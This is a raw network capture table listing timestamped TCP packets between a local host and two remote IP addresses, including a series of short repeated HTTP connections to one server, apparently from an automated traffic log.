Oct 3, 2024 09:20:42.058078051 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.058079958 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.058103085 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.058156013 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.111797094 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.112019062 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.112173080 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.112231970 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.112243891 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.112303019 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.112359047 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.112365007 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.112435102 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.112870932 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.112925053 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.112999916 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.113059044 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.113804102 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.113857985 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.113923073 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.113971949 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.114695072 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.114746094 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.114964962 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.115019083 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.701965094 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.702050924 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.702121019 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.702159882 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.702171087 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.743246078 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.778862000 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.779014111 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.779047966 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.779115915 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.882430077 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.882493019 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.884565115 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.884649038 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.934788942 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.934899092 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.934919119 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.934941053 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.934988022 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.031024933 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.031104088 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.031117916 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.031151056 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.031182051 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.031199932 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.031642914 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.031682014 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.031686068 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.031694889 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.031733990 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.033894062 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.033952951 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.033994913 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.034038067 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.034044027 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.075192928 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.116597891 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.116650105 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.116672039 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.116683960 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.116718054 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.116734028 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.126434088 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.126491070 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.209958076 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.209980965 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.210016012 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.210077047 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.210095882 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.210124016 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.210149050 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.245990038 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.246009111 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.246090889 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.246121883 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.246131897 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.246819973 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.246885061 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.246898890 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.246985912 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.356832981 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.356856108 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.356925011 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.356960058 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.356998920 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.357007980 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.359107018 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.359174013 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.359198093 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.359215975 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.359236956 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.399498940 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.404328108 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.404392958 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.404489994 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.404524088 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.404535055 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.405793905 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.405810118 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.405858040 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.405868053 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.405905008 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.446355104 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.477339029 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.477361917 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.477397919 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.477463007 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.477495909 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.477509022 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.477580070 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.487099886 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.487152100 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.487205982 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.487236977 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.487250090 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.540115118 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.558022976 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.558052063 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.558166981 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.558201075 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.558254004 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.559561968 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.559614897 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.559631109 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.559642076 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.559673071 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.559705973 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.631717920 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.631819010 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:43.631853104 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.631910086 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:43.651026964 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:46.719624043 CEST	49707	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:46.735009909 CEST	80	49707	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:46.735107899 CEST	49707	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:46.737293959 CEST	49707	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:46.743175030 CEST	80	49707	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:46.743247032 CEST	49707	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:46.749135971 CEST	80	49707	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:47.526560068 CEST	80	49707	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:47.526624918 CEST	80	49707	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:47.526720047 CEST	49707	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:47.526850939 CEST	49707	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:47.531702995 CEST	80	49707	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:47.667347908 CEST	49708	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:47.677870035 CEST	80	49708	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:47.678041935 CEST	49708	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:47.680047989 CEST	49708	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:47.692085981 CEST	80	49708	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:47.692235947 CEST	49708	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:47.701711893 CEST	80	49708	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:48.453088999 CEST	80	49708	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:48.453316927 CEST	49708	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:48.453324080 CEST	80	49708	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:48.453372002 CEST	49708	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:48.458396912 CEST	80	49708	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:48.531378031 CEST	49709	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:48.550137043 CEST	80	49709	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:48.551019907 CEST	49709	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:48.552500963 CEST	49709	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:48.567814112 CEST	80	49709	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:48.567975998 CEST	49709	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:48.577838898 CEST	80	49709	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:56.427699089 CEST	80	49709	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:56.428033113 CEST	49709	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:56.428255081 CEST	80	49709	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:56.428303003 CEST	49709	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:56.433087111 CEST	80	49709	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:56.574260950 CEST	49715	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:56.588548899 CEST	80	49715	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:56.588707924 CEST	49715	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:56.590853930 CEST	49715	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:56.608449936 CEST	80	49715	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:56.608551979 CEST	49715	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:56.616458893 CEST	80	49715	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:57.648911953 CEST	80	49715	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:57.649848938 CEST	49715	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:57.850330114 CEST	49716	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:57.961991072 CEST	49715	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:58.057420969 CEST	80	49715	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:58.057475090 CEST	49715	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:58.057509899 CEST	80	49715	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:58.057542086 CEST	49715	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:58.057943106 CEST	80	49715	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:58.057971954 CEST	80	49716	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:58.058073997 CEST	80	49715	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:58.058418036 CEST	49716	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:58.069458008 CEST	49716	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:58.316124916 CEST	80	49716	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:58.316278934 CEST	49716	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:58.325968027 CEST	80	49716	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:59.140589952 CEST	80	49716	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:59.140816927 CEST	49716	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:59.140839100 CEST	80	49716	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:59.140922070 CEST	49716	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:59.146092892 CEST	80	49716	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:59.276479959 CEST	49717	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:59.281760931 CEST	80	49717	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:59.281872988 CEST	49717	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:59.283987045 CEST	49717	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:59.297473907 CEST	80	49717	45.149.241.169	192.168.2.10
Oct 3, 2024 09:20:59.297568083 CEST	49717	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:20:59.316531897 CEST	80	49717	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:00.116126060 CEST	80	49717	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:00.116460085 CEST	80	49717	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:00.116580009 CEST	49717	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:00.183010101 CEST	49717	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:00.189299107 CEST	80	49717	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:00.479073048 CEST	49718	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:00.484904051 CEST	80	49718	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:00.485011101 CEST	49718	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:00.487117052 CEST	49718	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:00.494637966 CEST	80	49718	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:00.494707108 CEST	49718	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:00.499641895 CEST	80	49718	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:01.613163948 CEST	80	49718	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:01.613213062 CEST	80	49718	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:01.613317966 CEST	49718	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:01.613380909 CEST	49718	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:01.618177891 CEST	80	49718	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:01.765247107 CEST	49719	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:01.770503998 CEST	80	49719	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:01.770618916 CEST	49719	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:01.772759914 CEST	49719	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:01.777630091 CEST	80	49719	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:01.777715921 CEST	49719	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:01.782587051 CEST	80	49719	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:03.525882006 CEST	80	49719	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:03.526068926 CEST	80	49719	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:03.526211023 CEST	49719	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:03.526211023 CEST	49719	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:03.531218052 CEST	80	49719	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:03.670648098 CEST	49720	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:03.676484108 CEST	80	49720	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:03.678564072 CEST	49720	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:03.678724051 CEST	49720	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:03.683936119 CEST	80	49720	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:03.684047937 CEST	49720	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:03.689374924 CEST	80	49720	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:04.410466909 CEST	80	49720	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:04.410657883 CEST	49720	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:04.410867929 CEST	80	49720	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:04.410918951 CEST	49720	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:04.415994883 CEST	80	49720	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:04.557486057 CEST	49721	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:04.578835964 CEST	80	49721	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:04.579140902 CEST	49721	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:04.581398010 CEST	49721	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:04.600364923 CEST	80	49721	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:04.600647926 CEST	49721	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:04.614440918 CEST	80	49721	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:05.365163088 CEST	80	49721	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:05.365411997 CEST	80	49721	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:05.365447044 CEST	49721	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:05.365627050 CEST	49721	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:05.371099949 CEST	80	49721	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:05.512638092 CEST	49722	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:05.517693043 CEST	80	49722	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:05.518567085 CEST	49722	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:05.520092964 CEST	49722	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:05.527950048 CEST	80	49722	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:05.528198004 CEST	49722	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:05.533143044 CEST	80	49722	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:06.262666941 CEST	80	49722	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:06.262739897 CEST	80	49722	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:06.262912989 CEST	49722	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:06.263021946 CEST	49722	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:06.270015955 CEST	80	49722	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:06.410002947 CEST	49723	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:06.416441917 CEST	80	49723	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:06.416732073 CEST	49723	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:06.418783903 CEST	49723	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:06.423690081 CEST	80	49723	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:06.423847914 CEST	49723	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:06.428869963 CEST	80	49723	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:07.156114101 CEST	80	49723	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:07.156686068 CEST	49723	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:07.157257080 CEST	80	49723	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:07.157779932 CEST	49723	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:07.162168026 CEST	80	49723	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:07.311839104 CEST	49724	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:07.323482037 CEST	80	49724	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:07.323698044 CEST	49724	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:07.330524921 CEST	49724	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:07.339010954 CEST	80	49724	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:07.339145899 CEST	49724	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:07.349272013 CEST	80	49724	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:08.095299959 CEST	80	49724	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:08.095624924 CEST	49724	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:08.095794916 CEST	80	49724	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:08.095837116 CEST	49724	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:08.100419998 CEST	80	49724	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:08.242543936 CEST	49725	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:08.247611046 CEST	80	49725	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:08.247709990 CEST	49725	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:08.249841928 CEST	49725	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:08.254713058 CEST	80	49725	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:08.254832983 CEST	49725	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:08.260013103 CEST	80	49725	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:09.011538029 CEST	80	49725	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:09.011565924 CEST	80	49725	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:09.011679888 CEST	49725	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:09.011679888 CEST	49725	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:09.016618967 CEST	80	49725	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:09.151628971 CEST	49726	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:09.156621933 CEST	80	49726	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:09.156709909 CEST	49726	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:09.158802032 CEST	49726	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:09.163705111 CEST	80	49726	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:09.163793087 CEST	49726	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:09.168683052 CEST	80	49726	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:09.861022949 CEST	80	49726	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:09.861042023 CEST	80	49726	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:09.861236095 CEST	49726	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:09.861434937 CEST	49726	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:09.866203070 CEST	80	49726	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:10.025063992 CEST	49727	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:10.030177116 CEST	80	49727	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:10.030442953 CEST	49727	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:10.033673048 CEST	49727	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:10.038615942 CEST	80	49727	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:10.038727999 CEST	49727	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:10.043526888 CEST	80	49727	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:10.867872000 CEST	80	49727	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:10.867894888 CEST	80	49727	45.149.241.169	192.168.2.10
Oct 3, 2024 09:21:10.868266106 CEST	49727	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:10.868568897 CEST	49727	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:21:10.873454094 CEST	80	49727	45.149.241.169	192.168.2.10
